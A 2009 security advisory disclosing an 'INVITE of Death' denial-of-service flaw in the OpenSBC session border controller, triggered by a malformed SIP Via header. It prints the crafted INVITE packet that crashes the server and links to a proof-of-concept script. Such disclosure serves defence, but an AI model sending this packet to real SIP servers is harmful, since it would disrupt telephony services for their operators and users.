OpenSBC (INVITE of Death)Advisory Draft Date: 2nd Feburary, 2009.
Release Date: 16th Feburary, 2009.
|Affected Application||OpenSBC Server|
|Reported To||Joegen Baclor (CTO Solegy Systems)|
|Author||M. Zubair Rafique and Dr. Muddassar Farooq|
BackgroundOpenSBC is an ongoing attempt to create an open-source Session Border Controller that is fully compliant with the mandates of RFC 3261. OpenSBC can be used as a SIP router, media anchor for farend NAT traversal, SIP egress and ingress trunking among others. More information about the server can be found at http://opensipstack.org/
OverviewThe INVITE of Death vulnerability in OpenSBC server allows the attacker to crash the server causing remote Denial of Service (DOS). The problem specifically exists in OpenSBC version 1.1.5-25 in the handling of “Via” field caused from maliciously crafted SIP packet.
Proof of ConceptThe proof of concept code can be downloaded from here: OpenSBC.pl.
The malicious Packet on which the server crash is shown below:INVITE sip:email@example.com SIP/2.0
Via:::::: SIP/2.0/UDP localhost.localdomain:5060;branch=z9hG4bK000000
From: 0 ;tag=0
CSeq: 1 INVITE
o=0 0 0 IN IP4 localhost.localdomain
c=IN IP4 127.0.0.1
m=audio 9876 RTP/AVP 0
The OpenSBC devolpment team has been reported about the vulnerability. Below is the E-mail exchange content between our research team and the CTO of Solegey Systems:
CreditsThe vulnerability was discovered by Zubair Rafique and Sohail Aziz from the IMS security research project team.
ContactM. Zubair Rafique M. Ali Akbar
The contents of this advisory are copyright (c) 2009 nexGIN RC , and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.